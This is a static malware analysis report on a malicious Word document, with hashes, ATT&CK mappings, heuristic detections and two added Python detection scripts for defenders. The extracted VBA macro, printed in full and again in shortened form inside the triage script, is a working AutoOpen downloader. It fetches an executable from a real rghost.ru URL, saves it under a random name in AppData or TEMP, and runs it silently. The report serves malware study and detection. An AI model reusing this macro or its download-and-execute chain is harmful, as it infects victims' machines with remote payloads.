Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b993f242164e6ca4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 48.5 KB
Created: 2015-07-24 20:58:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 1c623922f273a1df2b6fd9c0a3532a4b
SHA-1: c692fa13a6b1a05e7d372cbf62a51fbae3eeaa8f
SHA-256: b993f242164e6ca498f86c93124786bcf768e003878a416fcb83365578f06cba
Risk Score: 440

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer
T1204.002 User Execution: Malicious File

The sample contains a VBA macro whose AutoOpen subroutine runs as soon as the document is opened with macros enabled. The macro imports URLDownloadToFileA from urlmon.dll under a long random alias (Declare PtrSafe Function ... Lib "urlmon.dll" Alias "URLDownloadToFileA"), downloads a second-stage executable from "http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exe" and writes it as <8 random letters>.exe into %AppData%, falling back to %TEMP% if that folder does not exist; the two environment-variable names are stored reversed ("ataDppA", "PMET") and decoded with StrReverse at run time. It then calls Shell() on the dropped file, which is plain downloader/dropper behaviour. The whole routine runs under On Error GoTo y followed by End, so if the download fails (file host no longer serving the payload, no network access) the macro exits silently and the user sees no error. Nothing beyond the macro was carved from the document, so the second stage exists only at that URL and must be fetched live to analyse it.
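
The execution chain above (Word writes <8 letters>.exe to %AppData% or %TEMP% and launches it) can be turned into a behavioural detection independent of the macro text. The following is an added example, not part of this report's tooling: the event records are constructed to resemble process-creation telemetry (the Sysmon-style field names ParentImage/Image are an assumption), and the path pattern is derived directly from the macro's Environ("AppData") / Environ("TEMP"), T(8) and ".exe" concatenation.

```python
"""Behavioural detection for the Word -> <8 letters>.exe chain this macro produces.

Added example, not the report's tooling. EVENTS is constructed sample telemetry;
the ParentImage/Image field names are an assumption (Sysmon Event ID 1 style).
"""
import re

# Office hosts that can run an AutoOpen/Auto_Open macro; Word is this sample's host.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}

# %APPDATA% resolves to ...\AppData\Roaming and %TEMP% to ...\AppData\Local\Temp
# on a default Windows profile, so these are the two drop directories the macro
# can produce.  [A-Za-z]{8} is exactly T(8): eight ASCII letters, no digits.
DROP_PATH_RE = re.compile(
    r"\\AppData\\(?:Roaming|Local\\Temp)\\[A-Za-z]{8}\.exe$", re.IGNORECASE
)

# Constructed sample events; only the first one reproduces the sample's behaviour.
EVENTS = [
    {   # Word spawning an 8-letter exe from %APPDATA%: the dropper chain
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Users\alice\AppData\Roaming\qKzLpWdR.exe",
    },
    {   # Word spawning the print-spooler helper: a benign Office child
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
    },
    {   # Same path shape, but launched from Explorer, not from an Office host
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Users\alice\AppData\Local\Temp\AbCdEfGh.exe",
    },
    {   # Word child from %TEMP%, but the name is not T(8): digits and underscore
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Users\alice\AppData\Local\Temp\setup_2019.exe",
    },
]


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_office_parent(event: dict) -> bool:
    """True when the process was spawned by an Office application."""
    return image_name(event["ParentImage"]) in OFFICE_IMAGES


def matches_drop_path(path: str) -> bool:
    """True when the path has the shape the macro builds: <AppData|TEMP>\\<8 letters>.exe."""
    return DROP_PATH_RE.search(path) is not None


def detect_office_dropper(events: list) -> list:
    """Return the image paths of children that match the dropper chain:
    an Office parent executing <8 letters>.exe from %APPDATA% or %TEMP%."""
    return [
        ev["Image"]
        for ev in events
        if is_office_parent(ev) and matches_drop_path(ev["Image"])
    ]


if __name__ == "__main__":
    for hit in detect_office_dropper(EVENTS):
        print("office dropper chain:", hit)
```

The parent/child relationship is the durable part of this rule: the eight-letter name and the directory order are attacker choices (T(8) and the Environ array) and will change between builds, so treat DROP_PATH_RE as tuning for this family rather than the core condition. Note also that the download itself happens inside the Word process through urlmon, so a network event from WINWORD.EXE to the rghost.ru host precedes the child process creation and gives a second, earlier detection point.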

Heuristics 13

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D
            B = Shell(D, Z)
    y:
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Dim t5A1S674WBx8txqVRmSFU4u4Z7mnVt5h4CK1hvWiSBMlITPS8Qd6ZpuKB4N2QMGG22gT2M9pbuork8CHNcVprCSiCTBz9XFWokaEbVIoSfopjgNpPq As String
        Private Declare PtrSafe Function FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi Lib "urlmon.dll" Alias "URLDownloadToFileA" _
        (ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long, _
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
            C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D
            B = Shell(D, Z)
    y:
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Dim Q As Object
            Set Q = CreateObject("Scripting.FileSystemObject")
            R = Q.FolderExists(sFullPath)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
        Sub AutoOpen()
        On Error GoTo y
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
                N = StrReverse(O(i))
                If R(Environ(N)) Then
                    L = Environ(N) & "\"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic description assumes that no modern VBA project was recovered; for this sample a full VBA project was recovered (see the extracted macros.bas), so the marker is the same AutoOpen procedure name already reported by OLE_VBA_AUTOOPEN and adds no independent evidence. On its own the marker documents old Word macro execution surface, not downloader behaviour or a parser-CVE attribution.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (referenced by macro)
    • http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exe (referenced by macro)
    The three schemas.openxmlformats.org entries are standard Office XML namespace identifiers and are never fetched over the network; the rghost.ru URL is the only network indicator, and it is the one passed to URLDownloadToFileA by AutoOpen.
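
The heuristics above (OLE_VBA_OBFUSCATED_SHELL_URL, OLE_VBA_DOWNLOAD, OLE_VBA_ENVIRON) and the behaviour summary describe one static pattern: an auto-exec procedure, a Declare that imports URLDownloadToFileA, a Shell() call and a URL in the same project, with StrReverse hiding the environment-variable names. The script below is an added example of that triage, not the report's tooling or oletools code. SAMPLE_VBA is a constructed, shortened copy of the sample's macro: the identifiers are the sample's, but the padding declarations, the T() name generator and the FileSystemObject helper are omitted and the Declare's parameter names are shortened (an assumption, marked in the text).

```python
"""Static triage of VBA source for the AutoOpen -> URLDownloadToFile -> Shell
dropper pattern, with decoding of StrReverse-hidden environment-variable names.

Added example, not the report's tooling. SAMPLE_VBA is a constructed, shortened
copy of the sample's macro (see lead-in for what was cut).
"""
import re

# Procedure names Word/Excel run automatically when a document is opened.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|AutoExec|AutoClose|Document_Open|Auto_Open|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE,
)
# Declare ... Lib "dll" [Alias "export"]: the alias names the real Win32 export,
# whatever random local name the macro gives it.
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)
STRING_RE = re.compile(r'"([^"\r\n]*)"')
URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.IGNORECASE)
SHELL_RE = re.compile(r"\bShell\s*\(", re.IGNORECASE)
STRREVERSE_RE = re.compile(r"\bStrReverse\s*\(", re.IGNORECASE)
# Environment variables a dropper resolves to find a writable directory.
ENV_DIRS = {"APPDATA", "LOCALAPPDATA", "TEMP", "TMP", "USERPROFILE", "PUBLIC", "PROGRAMDATA"}

SAMPLE_VBA = r'''
Sub S()
    O = Array("ataDppA", "PMET")
    For i = 0 To UBound(O)
        N = StrReverse(O(i))
        If R(Environ(N)) Then
            L = Environ(N) & "\"
            Exit For
        End If
    Next
    P = T(8)
End Sub

Sub AutoOpen()
On Error GoTo y
    Call S
    A = 0
    Z = vbNormalFocus
    U = "http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exe"
    D = L & P & ".exe"
    C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D
    B = Shell(D, Z)
y:
    End
End Sub

' From class module ESPASPPHLSO; parameter names shortened here (assumption).
Private Declare PtrSafe Function FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi Lib "urlmon.dll" Alias "URLDownloadToFileA" _
(ByVal a As Long, ByVal u As String, ByVal f As String, ByVal r As Long, ByVal cb As Long) As Long
'''


def decode_reversed_literals(src: str) -> dict:
    """If the macro calls StrReverse, read every string literal backwards and
    keep the ones that become a known environment-variable name."""
    if not STRREVERSE_RE.search(src):
        return {}
    return {lit: lit[::-1] for lit in STRING_RE.findall(src)
            if lit[::-1].upper() in ENV_DIRS}


def triage_vba(src: str) -> dict:
    """Collect the dropper indicators from VBA source and score them the way
    OLE_VBA_OBFUSCATED_SHELL_URL does: all four together beat any one alone."""
    declares = [(name, lib, alias or name)
                for name, lib, alias in DECLARE_RE.findall(src)]
    download_apis = [d for d in declares
                     if d[1].lower() == "urlmon.dll"
                     or d[2].lower().startswith("urldownloadtofile")]
    urls = list(dict.fromkeys(URL_RE.findall(src)))   # de-duplicated, order kept
    autoexec = AUTOEXEC_RE.findall(src)
    shell_calls = len(SHELL_RE.findall(src))
    if autoexec and download_apis and shell_calls and urls:
        verdict = "dropper"
    elif autoexec and (download_apis or shell_calls):
        verdict = "suspicious"
    else:
        verdict = "none"
    return {
        "autoexec": autoexec,
        "declares": declares,
        "download_apis": download_apis,
        "urls": urls,
        "shell_calls": shell_calls,
        "decoded_strings": decode_reversed_literals(src),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Resolving the Alias rather than the random local name is what makes the Declare check robust here: the macro can rename FxH9Yz... freely, but the string "URLDownloadToFileA" must survive for the import to work. The same holds for the reversed literals, which is why trying every string literal backwards against a small list of environment-variable names recovers "AppData" and "TEMP" without executing anything.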

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4984 bytes
SHA-256: f8ea97ce934f55e11b9555b1643ae1168adde288dd59f469d37b1253b4f2984d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s). The decoded source below contains no Base64 decoding call, so these blobs are almost certainly the very long random identifiers used for the class method, the API alias and its parameters rather than an encoded payload; the only payload is fetched from the URL at run time.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
    

    Dim C As New ESPASPPHLSO
    Dim B, A, Z As Long
    Dim U, D, W, O, L, P, N, G As String
     
    Private Function T(cb As Integer) As String
        Randomize
        W = "abcdefghijklmnopqrstuvwxyz"
        W = W & UCase(W)
     
        Dim i As Long
        For i = 1 To cb
            T = T & Mid$(W, Int(Rnd() * Len(W) + 1), 1)
        Next
    End Function
     
    Private Function R(sFullPath As String) As Boolean
        Dim Q As Object
        Set Q = CreateObject("Scripting.FileSystemObject")
        R = Q.FolderExists(sFullPath)
    End Function
     
    Sub S()
        O = Array("ataDppA", "PMET")
       
        For i = 0 To UBound(O)
            N = StrReverse(O(i))
            If R(Environ(N)) Then
                L = Environ(N) & "\"
                Exit For
            End If
        Next
       
        P = T(8)
    End Sub
     
    Sub AutoOpen()
    On Error GoTo y
        Call S
        A = 0
        Z = vbNormalFocus
        U = "http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exe"
        D = L & P & ".exe"
        C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D
        B = Shell(D, Z)
y:
    End
    End Sub



Attribute VB_Name = "ESPASPPHLSO"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    

    Dim DkTIOoUzevYkmKiObHBo9u7UfGyGWn7zcbxVta2AKXkTuBEGFKGjLrGBIjlW0rT7Cp3w0k2Y9MzPvRRU2aDAeN7G3k, zXSy3V0ruqQUKqYG8ntXwhXtfAvq9gIyzMG5l6ZHQIKFTzxFP8tVwo7ahOACYltY As String
    Dim tRu19lQzS1hpAuwTLQLSoFKHU3GbiBhH2pL454RFUGMiuOflhAuCfActTTCL87rPulVvTbK8PH9zgwR9FH4JZSwDJ6qIQ0ukNEXizFwYC6pdUAllUcxdCxJasH63r As String
    Dim pc0lRt7v9chSxeq2HU34T46AN53FFLTTds4oD1yKFNO2xDPRWQ3j6jt0Kmx06QeUS50PiXRl3Leypo632 As String
    Dim kuc9d6nvY1ptWIohXaUCmP3J1Gpjfb6BUjHjlxjFoOwmpDpEdWBebdaj7qIDp2jpS1AmQRCHcvZ8fqOTRAFImtFMC2nQWLU6cCQhJ3iBn3Q As String
    Dim t5A1S674WBx8txqVRmSFU4u4Z7mnVt5h4CK1hvWiSBMlITPS8Qd6ZpuKB4N2QMGG22gT2M9pbuork8CHNcVprCSiCTBz9XFWokaEbVIoSfopjgNpPq As String
    Private Declare PtrSafe Function FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi Lib "urlmon.dll" Alias "URLDownloadToFileA" _
    (ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long, _
    ByVal DkTIOoUzevYkmKiObHBo9u7UfGyGWn7zcbxVta2AKXkTuBEGFKGjLrGBIjlW0rT7Cp3w0k2Y9MzPvRRU2aDAeN7G3k As String, _
    ByVal tRu19lQzS1hpAuwTLQLSoFKHU3GbiBhH2pL454RFUGMiuOflhAuCfActTTCL87rPulVvTbK8PH9zgwR9FH4JZSwDJ6qIQ0ukNEXizFwYC6pdUAllUcxdCxJasH63r As String, _
    ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long, _
    ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long) As Long
    Dim A6VGtKVeEQXYTgZuWjtU0QpNNeffxhWRXmZJfimsaru7TEnjbfu9d5MdKvIAYmhSCZWaUdF3yqU, LqEwhzmMjH10za4ihOugaZLYrwQ2OLcywzN5gf7LhG8ahciotEz1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQM As String
    Dim sNLBsTv7A6PJzLaxDJv7uljBmryyYoH4w0IKKD5FR9KsARcb8CpreMOl5bqsqaFUsAyfVLwB1zyztk7dvTa9QBcsGiaKKkw7hxg8YhQ As String
    Dim H3ne2fbUCLxPdjNsX9MMqXRfHXSQoT92BXxMTSozoSylFGmAPuEgs1MQFwAj2Gp6EJ6d7oZ6xSWKuUiA4HTDSZ3k0XFD2m235o1wJMYw4LI0G1CtHNvSFOIGIg7R As String
    Dim U2STVjHI3jOYvRag0ieGLuZQvKUOsWWbkpz4kZK4b2Yf8nbdRmR3BQZn5a0hw9TkCa8DB2GNc80TDg5xBOnOkAQixWY7 As String
     
    Public Sub Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd(v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG, pc0lRt7v9chSxeq2HU34T46AN53FFLTTds4oD1yKFNO2xDPRWQ3j6jt0Kmx06QeUS50PiXRl3Leypo632, sNLBsTv7A6PJzLaxDJv7uljBmryyYoH4w0IKKD5FR9KsARcb8CpreMOl5bqsqaFUsAyfVLwB1zyztk7dvTa9QBcsGiaKKkw7hxg8YhQ)
        FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG, pc0lRt7v9chSxeq2HU34T46AN53FFLTTds4oD1yKFNO2xDPRWQ3j6jt0Kmx06QeUS50PiXRl3Leypo632, sNLBsTv7A6PJzLaxDJv7uljBmryyYoH4w0IKKD5FR9KsARcb8CpreMOl5bqsqaFUsAyfVLwB1zyztk7dvTa9QBcsGiaKKkw7hxg8YhQ, v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG, v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG
    End Sub